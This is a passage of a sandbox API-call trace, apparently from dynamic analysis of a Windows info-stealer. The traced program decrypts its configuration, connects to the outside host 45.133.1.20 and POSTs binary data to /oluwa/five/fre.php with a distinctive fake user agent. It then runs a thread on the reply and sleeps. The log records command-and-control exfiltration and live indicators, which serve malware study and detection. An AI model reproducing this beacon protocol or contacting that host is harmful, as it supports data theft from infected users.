(lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0229.976] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0229.976] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0229.976] GetProcessHeap () returned 0x6a0000 [0229.976] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0229.976] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0229.976] GetProcessHeap () returned 0x6a0000 [0229.977] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0229.977] GetProcessHeap () returned 0x6a0000 [0229.977] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0229.977] GetProcessHeap () returned 0x6a0000 [0229.978] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0229.978] GetProcessHeap () returned 0x6a0000 [0229.978] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0229.978] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0229.979] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0229.986] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0229.986] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0229.994] GetProcessHeap () returned 0x6a0000 [0229.994] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0229.995] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0229.995] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0229.996] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0229.997] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0229.997] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0229.999] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0229.999] GetProcessHeap () returned 0x6a0000 [0230.000] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0230.001] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0230.001] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0230.002] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0230.005] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0230.006] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0230.006] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0230.006] GetProcessHeap () returned 0x6a0000 [0230.006] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0230.007] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0230.007] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0230.008] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0230.008] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0230.009] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0230.009] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0230.010] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0230.010] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0230.010] GetProcessHeap () returned 0x6a0000 [0230.010] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0230.010] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0230.011] GetProcessHeap () returned 0x6a0000 [0230.011] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba9b0 [0230.011] socket (af=2, type=1, protocol=6) returned 0x6f8 [0230.011] connect (s=0x6f8, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0230.036] FreeAddrInfoW (pAddrInfo=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0230.036] GetProcessHeap () returned 0x6a0000 [0230.036] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0230.036] GetProcessHeap () returned 0x6a0000 [0230.036] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6daf28 [0230.037] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0230.038] wvsprintfA (in: param_1=0x6daf28, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0230.038] GetProcessHeap () returned 0x6a0000 [0230.038] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6d9600 [0230.039] GetProcessHeap () returned 0x6a0000 [0230.039] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6daf28 | out: hHeap=0x6a0000) returned 1 [0230.039] GetProcessHeap () returned 0x6a0000 [0230.039] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4d48 [0230.039] GetProcessHeap () returned 0x6a0000 [0230.039] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6daf28 [0230.041] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0230.042] wvsprintfA (in: param_1=0x6daf28, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0230.042] GetProcessHeap () returned 0x6a0000 [0230.042] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0230.042] GetProcessHeap () returned 0x6a0000 [0230.042] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6daf28 | out: hHeap=0x6a0000) returned 1 [0230.042] send (s=0x6f8, buf=0x6bd460*, len=242, flags=0) returned 242 [0230.043] send (s=0x6f8, buf=0x6bb998*, len=159, flags=0) returned 159 [0230.043] GetProcessHeap () returned 0x6a0000 [0230.043] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6720 [0230.043] recv (in: s=0x6f8, buf=0x6c6720, len=4048, flags=0 | out: buf=0x6c6720*) returned 204 [0230.122] GetProcessHeap () returned 0x6a0000 [0230.122] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0230.122] GetProcessHeap () returned 0x6a0000 [0230.123] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0230.123] GetProcessHeap () returned 0x6a0000 [0230.124] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d9600 | out: hHeap=0x6a0000) returned 1 [0230.125] GetProcessHeap () returned 0x6a0000 [0230.125] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0230.125] closesocket (s=0x6f8) returned 0 [0230.126] GetProcessHeap () returned 0x6a0000 [0230.126] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba9b0 | out: hHeap=0x6a0000) returned 1 [0230.126] GetProcessHeap () returned 0x6a0000 [0230.126] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0230.126] GetProcessHeap () returned 0x6a0000 [0230.126] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0230.127] GetProcessHeap () returned 0x6a0000 [0230.127] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0230.127] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6720, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1420) returned 0x6f8 [0230.129] Sleep (dwMilliseconds=0xea60) [0230.130] GetProcessHeap () returned 0x6a0000 [0230.130] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0230.131] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0230.131] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0230.141] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0230.141] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf168) returned 1 [0230.151] GetProcessHeap () returned 0x6a0000 [0230.151] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0230.151] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0230.152] CryptImportKey (in: hProv=0x6bf168, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0230.152] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0230.153] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0230.154] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0230.154] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0230.154] GetProcessHeap () returned 0x6a0000 [0230.155] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0230.155] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0230.156] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0230.156] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0230.157] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0230.157] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0230.158] CryptReleaseContext (hProv=0x6bf168, dwFlags=0x0) returned 1 [0230.158] GetProcessHeap () returned 0x6a0000 [0230.158] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0230.158] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0230.159] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0230.159] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0230.160] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0230.164] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0230.165] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0230.166] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0230.166] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0230.166] GetProcessHeap () returned 0x6a0000 [0230.166] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0230.166] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0230.166] GetProcessHeap () returned 0x6a0000 [0230.167] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0230.167] GetProcessHeap () returned 0x6a0000 [0230.167] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0230.167] GetProcessHeap () returned 0x6a0000 [0230.168] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0230.168] GetProcessHeap () returned 0x6a0000 [0230.168] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0230.170] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0230.171] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0230.176] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0230.176] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf168) returned 1 [0230.185] GetProcessHeap () returned 0x6a0000 [0230.185] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0230.186] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0230.186] CryptImportKey (in: hProv=0x6bf168, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0230.187] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0230.187] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0230.188] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0230.188] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0230.188] GetProcessHeap () returned 0x6a0000 [0230.189] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0230.190] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0230.190] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0230.192] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0230.193] CryptDestroyKey (hKey=0x6ad020) returned 1 [0230.194] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0230.194] CryptReleaseContext (hProv=0x6bf168, dwFlags=0x0) returned 1 [0230.194] GetProcessHeap () returned 0x6a0000 [0230.194] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0230.195] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0230.195] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0230.196] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0230.196] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0230.197] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0230.197] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0230.198] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0230.198] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0230.198] GetProcessHeap () returned 0x6a0000 [0230.198] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0230.198] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0230.198] GetProcessHeap () returned 0x6a0000 [0230.198] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba9a0 [0230.198] socket (af=2, type=1, protocol=6) returned 0x6fc [0230.198] connect (s=0x6fc, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0230.226] FreeAddrInfoW (pAddrInfo=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0230.226] GetProcessHeap () returned 0x6a0000 [0230.226] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0230.226] GetProcessHeap () returned 0x6a0000 [0230.227] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6daf28 [0230.227] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0230.228] wvsprintfA (in: param_1=0x6daf28, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0230.228] GetProcessHeap () returned 0x6a0000 [0230.228] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6d9840 [0230.228] GetProcessHeap () returned 0x6a0000 [0230.229] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6daf28 | out: hHeap=0x6a0000) returned 1 [0230.229] GetProcessHeap () returned 0x6a0000 [0230.229] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4be0 [0230.229] GetProcessHeap () returned 0x6a0000 [0230.229] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6daf28 [0230.229] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0230.230] wvsprintfA (in: param_1=0x6daf28, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0230.230] GetProcessHeap () returned 0x6a0000 [0230.230] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0230.230] GetProcessHeap () returned 0x6a0000 [0230.230] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6daf28 | out: hHeap=0x6a0000) returned 1 [0230.230] send (s=0x6fc, buf=0x6bd460*, len=242, flags=0) returned 242 [0230.231] send (s=0x6fc, buf=0x6bb998*, len=159, flags=0) returned 159 [0230.231] GetProcessHeap () returned 0x6a0000 [0230.231] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6720 [0230.231] recv (in: s=0x6fc, buf=0x6c6720, len=4048, flags=0 | out: buf=0x6c6720*) returned 204 [0230.302] GetProcessHeap () returned 0x6a0000 [0230.303] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0230.303] GetProcessHeap () returned 0x6a0000 [0230.304] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0230.305] GetProcessHeap () returned 0x6a0000 [0230.305] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d9840 | out: hHeap=0x6a0000) returned 1 [0230.305] GetProcessHeap () returned 0x6a0000 [0230.306] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0230.306] closesocket (s=0x6fc) returned 0 [0230.306] GetProcessHeap () returned 0x6a0000 [0230.306] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba9a0 | out: hHeap=0x6a0000) returned 1 [0230.306] GetProcessHeap () returned 0x6a0000 [0230.308] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0230.309] GetProcessHeap () returned 0x6a0000 [0230.309] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0230.309] GetProcessHeap () returned 0x6a0000 [0230.309] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0230.310] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6720, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1424) returned 0x6fc [0230.314] Sleep (dwMilliseconds=0xea60) [0230.315] GetProcessHeap () returned 0x6a0000 [0230.315] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0230.316] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0230.317] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0230.323] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0230.324] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bed28) returned 1 [0230.369] GetProcessHeap () returned 0x6a0000 [0230.369] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0230.371] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0230.371] CryptImportKey (in: hProv=0x6bed28, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0230.372] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0230.372] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0230.373] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0230.374] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0230.374] GetProcessHeap () returned 0x6a0000 [0230.374] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0230.375] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0230.375] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0230.453] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0230.454] CryptDestroyKey (hKey=0x6ad020) returned 1 [0230.455] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0230.455] CryptReleaseContext (hProv=0x6bed28, dwFlags=0x0) returned 1 [0230.455] GetProcessHeap () returned 0x6a0000 [0230.455] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0230.456] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0230.456] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0230.460] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0230.460] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0230.461] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0230.461] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0230.462] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0230.462] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0230.462] GetProcessHeap () returned 0x6a0000 [0230.462] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0230.463] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, 